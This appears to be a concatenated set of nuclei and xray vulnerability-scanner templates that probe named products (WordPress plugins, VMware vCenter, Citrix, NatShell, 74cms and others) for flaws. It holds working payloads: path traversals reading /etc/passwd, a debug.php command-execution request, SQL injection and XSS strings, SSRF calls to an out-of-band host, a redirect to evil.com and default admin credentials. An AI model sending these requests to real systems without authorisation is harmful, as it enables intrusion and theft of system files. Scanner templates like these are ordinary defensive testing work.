/web/pocs/nuclei/vulnerabilities/other/ecology-springframework-directory-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: ecology-springframework-directory-traversal 2 | 3 | info: 4 | name: Ecology Springframework Directory Traversal 5 | author: princechaddha 6 | severity: medium 7 | tags: ecology,springframework,lfi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml" 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "/weaver/" 21 | part: body 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/empirecms-xss.yaml: -------------------------------------------------------------------------------- 1 | id: empirecms-xss 2 | 3 | info: 4 | name: EmpireCMS v75 XSS 5 | author: pikpikcu 6 | severity: medium 7 | reference: 8 | - https://www.geek-share.com/detail/2777280260.html 9 | tags: empirecms,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: word 20 | words: 21 | - 'onmousewheel=\"return bbimg(this)\"' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/flir-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: flir-path-traversal 2 | 3 | info: 4 | name: Flir Path Traversal 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://juejin.cn/post/6961370156484263972 9 | tags: flir,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/download.php?file=/etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/groupoffice-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: groupoffice-lfi 2 | 3 | info: 4 | name: Groupoffice 3.4.21 Directory Traversal Vulnerability 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018020249 9 | - http://www.group-office.com 10 | tags: groupoffice,lfi,traversal 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd" 16 | 17 | matchers-condition: and 18 | matchers: 19 | 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/huawei-hg659-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: huawei-hg659-lfi 2 | 3 | info: 4 | name: HUAWEI HG659 LFI 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://twitter.com/sec715/status/1406782172443287559 9 | tags: lfi,huawei 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/myucms-lfr.yaml: -------------------------------------------------------------------------------- 1 | id: myucms-lfr 2 | 3 | info: 4 | name: MyuCMS Local File Read 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://blog.csdn.net/yalecaltech/article/details/104908257 9 | tags: myucms,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1" 15 | matchers: 16 | - type: regex 17 | regex: 18 | - "root:.*:0:0:" 19 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/natshell-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: natshell-path-traversal 2 | 3 | info: 4 | name: NatShell Path Traversal 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw 9 | metadata: 10 | fofa-query: title="蓝海卓越计费管理系统" 11 | tags: natshell,lfi 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" 17 | 18 | matchers-condition: and 19 | matchers: 20 | 21 | - type: regex 22 | regex: 23 | - "toor:[x*]:0:0" 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/natshell-rce.yaml: -------------------------------------------------------------------------------- 1 | id: natshell-rce 2 | 3 | info: 4 | name: NatShell Debug File RCE 5 | author: pikpikcu 6 | severity: critical 7 | reference: 8 | - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw 9 | tags: natshell,rce 10 | 11 | requests: 12 | - method: POST 13 | path: 14 | - "{{BaseURL}}/debug.php" 15 | body: | 16 | cmd=cat /etc/passwd 17 | 18 | matchers-condition: and 19 | matchers: 20 | 21 | - type: regex 22 | regex: 23 | - "toor:[x*]:0:0" 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/pacsone-server-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: pacsone-server-lfi 2 | 3 | info: 4 | name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018010303 9 | tags: pacsone,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - "root:[x*]:0:0" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/pmb-local-file-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: pmb-local-file-disclosure 2 | 3 | info: 4 | name: PMB 5.6 - getgif.php Arbitrary File Retrieval 5 | author: dhiyaneshDk 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/49054 9 | tags: lfi,pmb 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "root:x:0" 24 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/spark-webui-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: spark-webui-unauth 2 | 3 | info: 4 | name: Unauthenticated Spark WebUI 5 | author: princechaddha 6 | severity: medium 7 | reference: 8 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc 9 | tags: spark,unauth 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "Spark Master at spark://" 24 | - "<strong>URL:</strong>" 25 | part: body 26 | condition: and 27 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/symantec-messaging-gateway.yaml: -------------------------------------------------------------------------------- 1 | id: symantec-messaging-gateway 2 | 3 | info: 4 | name: Symantec Messaging Gateway LFI 5 | author: Random_Robbie 6 | severity: medium 7 | description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal 8 | tags: lfi,messaging,symantec 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "struts-default.xml" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/thinkific-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: thinkific-redirect 2 | 3 | info: 4 | name: Open Redirect vulnerability on thinkific websites 5 | author: Gal Nagli 6 | severity: medium 7 | tags: redirect 8 | 9 | requests: 10 | - method: GET 11 | 12 | path: 13 | - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 302 20 | - type: word 21 | words: 22 | - "<a href=\"http://evil.com?kind=jwt&message=Nil+JSON+web+token\"" 23 | condition: or 24 | part: body 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/tpshop-directory-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: tpshop-directory-traversal 2 | 3 | info: 4 | name: TPshop Directory Traversal 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA 9 | tags: tpshop,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: word 20 | words: 21 | - '"state":"SUCCESS"' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/unauth-rlm.yaml: -------------------------------------------------------------------------------- 1 | id: unauth-rlm 2 | 3 | info: 4 | name: Unauthenticated Reprise License Manager 5 | author: Akincibor 6 | severity: critical 7 | tags: unauth,rlm 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/goforms/menu" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | part: body 22 | words: 23 | - "RLM Administration Commands" -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/ransomware/deadbolt-ransomware.yaml: -------------------------------------------------------------------------------- 1 | id: deadbolt-ransomware 2 | 3 | info: 4 | name: Deadbolt Ransomware Detection 5 | author: pdteam 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "<title>ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT." -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: samsung-wlan-ap-lfi 2 | 3 | info: 4 | name: Samsung Wlan AP (WEA453e) LFI 5 | author: pikpikcu 6 | severity: critical 7 | reference: 8 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 9 | tags: xss,samsung,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/(download)/etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - "root:.*:0:0:" 21 | - "bin:.*:1:1" 22 | part: body 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml: -------------------------------------------------------------------------------- 1 | id: vmware-vcenter-lfi-linux 2 | 3 | info: 4 | name: Vmware Vcenter LFI for Linux appliances 5 | author: PR3R00T 6 | severity: high 7 | tags: vmware,lfi,vcenter 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/eam/vib?id=/etc/issue" 13 | matchers: 14 | - type: word 15 | words: 16 | - "vCenter Server" 17 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml: -------------------------------------------------------------------------------- 1 | id: vmware-vcenter-ssrf 2 | 3 | info: 4 | name: VMware vCenter SSRF/LFI/XSS 5 | author: pdteam 6 | severity: critical 7 | reference: 8 | - https://github.com/l0ggg/VMware_vCenter 9 | tags: ssrf,lfi,xss,oast,vcenter,vmware 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: interactsh_protocol 20 | words: 21 | - "http" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-db-backup-listing 2 | 3 | info: 4 | name: WordPress DB Backup 5 | author: Suman_Kar 6 | severity: medium 7 | tags: wordpress,backup 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/uploads/database-backups/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Index of /" 19 | - "wp-content/uploads/database-backups" 20 | - ".sql" 21 | condition: and 22 | part: body 23 | 24 | - type: status 25 | status: 26 | - 200 -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wordpress-db-backup.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-db-backup 2 | 3 | info: 4 | name: WordPress DB Backup 5 | author: dwisiswant0 6 | severity: medium 7 | tags: wordpress,backups 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/backup-db/" 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - "Index of /" 18 | - ".sql\">" 19 | condition: and 20 | part: body 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wordpress-directory-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-directory-listing 2 | 3 | info: 4 | name: Wordpress directory listing 5 | author: Manas_Harsh 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/uploads/" 13 | - "{{BaseURL}}/wp-content/themes/" 14 | - "{{BaseURL}}/wp-content/plugins/" 15 | - "{{BaseURL}}/wp-includes/" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | 23 | - type: word 24 | words: 25 | - "Index of /" 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wordpress-installer-log.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-installer-log 2 | 3 | info: 4 | name: WordPress Installer Log 5 | author: dwisiswant0 6 | severity: info 7 | tags: wordpress,log 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/installer-log.txt" 13 | matchers-condition: and 14 | matchers: 15 | - type: regex 16 | regex: 17 | - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? INSTALL-LOG" 18 | part: body 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-social-metrics-tracker 2 | 3 | info: 4 | name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export 5 | author: randomrobbie 6 | severity: medium 7 | tags: wordpress,wp-plugin 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "Main URL to Post" 22 | part: body -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-ssrf-oembed 2 | 3 | info: 4 | name: Wordpress Oembed Proxy SSRF 5 | author: dhiyaneshDk 6 | severity: medium 7 | reference: 8 | - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress 9 | - https://github.com/incogbyte/quickpress/blob/master/core/req.go 10 | tags: wordpress,ssrf,oast,proxy 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/" 16 | 17 | matchers: 18 | - type: word 19 | part: interactsh_protocol 20 | words: 21 | - "http" 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wordpress-user-enum.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-user-enum 2 | 3 | info: 4 | name: Wordpress User Enumeration 5 | author: r3dg33k 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/?author=1" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: regex 17 | regex: 18 | - '(?i)Location: http(s|):\/\/[\w\.\-]+\/author\/\w+' 19 | part: header 20 | - type: status 21 | status: 22 | - 301 23 | 24 | extractors: 25 | - type: regex 26 | part: header 27 | regex: 28 | - 'author\/\w+' 29 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wp-config-setup.yaml: -------------------------------------------------------------------------------- 1 | id: wp-config-setup 2 | 3 | info: 4 | name: WordPress Setup Configuration 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ 9 | tags: wordpress,setup 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-admin/setup-config.php?step=1" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Below you should enter your database connection details." 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wp-enabled-registration.yaml: -------------------------------------------------------------------------------- 1 | id: wp-enabled-registration 2 | 3 | info: 4 | name: WordPress user registration enabled 5 | author: Ratnadip Gajbhiye 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/wp-login.php?action=register' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Register For This Site 19 | - E-mail 20 | condition: and 21 | part: body 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wp-license-file.yaml: -------------------------------------------------------------------------------- 1 | id: wp-license-file 2 | 3 | info: 4 | name: WordPress license file disclosure 5 | author: yashgoti 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/license.txt" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "WordPress - Web publishing software" 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: wp-simple-fields-lfi 2 | 3 | info: 4 | name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE 5 | author: 0x240x23elu 6 | severity: high 7 | reference: 8 | - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html 9 | tags: wordpress,wp-plugin,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - "root:.*:0:0:" 20 | part: body -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wp-tutor-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: wp-tutor-lfi 2 | 3 | info: 4 | name: WordPress Plugin tutor.1.5.3 - Local File Inclusion 5 | author: 0x240x23elu 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/48058 9 | tags: wordpress,wp-plugin,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - "root:.*:0:0:" 20 | part: body -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wp-vault-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: wp-vault-local-file-inclusion 2 | 3 | info: 4 | name: WP Vault 0.8.6.6 Local File Inclusion 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/40850 9 | tags: wp-plugin,wordpress,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wp-xmlrpc.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xmlrpc.php" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'XML-RPC server accepts POST requests only.' 17 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wpdm-cache-session.yaml: -------------------------------------------------------------------------------- 1 | id: wpdm-cache-session 2 | 3 | info: 4 | name: Wpdm-Cache Session 5 | author: dhiyaneshDk 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/ghdb/7004 9 | tags: wordpress 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Index of /" 20 | - ".txt" 21 | - "wpdm-cache" 22 | condition: and 23 | 24 | part: body 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/wordpress/wpmudev-pub-keys.yaml: -------------------------------------------------------------------------------- 1 | id: wpmudev-pub-keys 2 | 3 | info: 4 | name: Wpmudev Dashboard Pub Key 5 | author: dhiyaneshDk 6 | severity: medium 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6443 9 | tags: wordpress 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/wpmudev-updates/keys/' 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Index of /" 20 | - ".pub" 21 | - "wpmudev" 22 | condition: and 23 | 24 | part: body 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /web/pocs/xray2/74cms-sqli-2.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli-2 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: rexus 16 | links: 17 | - https://www.uedbox.com/post/30019/ 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/74cms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a 10 | expression: response.body.bcontains(b"ef775988943825d2871e1cfa75473ec") 11 | expression: r0() 12 | detail: 13 | author: jinqi 14 | links: 15 | - https://www.t00ls.net/articles-54436.html 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/airflow-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-airflow-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /admin/ 10 | expression: response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"

DAGs

") 11 | expression: r0() 12 | detail: 13 | author: pa55w0rd(www.pa55w0rd.online/) 14 | links: 15 | - http://airflow.apache.org/ 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/apache-kylin-unauth-cve-2020-13937.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-kylin-unauth-cve-2020-13937 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /kylin/api/admin/config 10 | expression: response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url") 11 | expression: r0() 12 | detail: 13 | author: JingLing(github.com/shmilylty) 14 | links: 15 | - https://s.tencent.com/research/bsafe/1156.html 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/apache-nifi-api-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-nifi-api-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /nifi-api/flow/current-user 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true") 12 | expression: r0() 13 | detail: 14 | author: wulalalaaa(https://github.com/wulalalaaa) 15 | links: 16 | - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/apache-storm-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-storm-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/v1/cluster/summary 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"{\"totalMem\":") && response.body.bcontains(b"\"stormVersion\":") 12 | expression: r0() 13 | detail: 14 | author: wulalalaaa(https://github.com/wulalalaaa) 15 | links: 16 | - https://storm.apache.org/releases/current/STORM-UI-REST-API.html 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/bt742-pma-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-bt742-pma-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /pma/ 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php") 12 | expression: r0() 13 | detail: 14 | author: Facker007(https://github.com/Facker007) 15 | links: 16 | - https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/chinaunicom-modem-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-chinaunicom-modem-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /cu.html 10 | body: frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password= 11 | follow_redirects: false 12 | expression: response.status == 302 && response.headers["location"] == "/menu.gch" 13 | expression: r0() 14 | detail: {} 15 | -------------------------------------------------------------------------------- /web/pocs/xray2/citrix-cve-2019-19781-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-cve-2019-19781-path-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /vpn/../vpns/cfg/smb.conf 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order") 12 | expression: r0() 13 | detail: 14 | author: su(https://suzzz112113.github.io/#blog) 15 | links: 16 | - https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/ 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/citrix-xenmobile-cve-2020-8209.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-xenmobile-cve-2020-8209 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/confluence-cve-2015-8399.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2015-8399 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /spaces/viewdefaultdecorator.action?decoratorName 10 | follow_redirects: false 11 | expression: response.status == 200 && 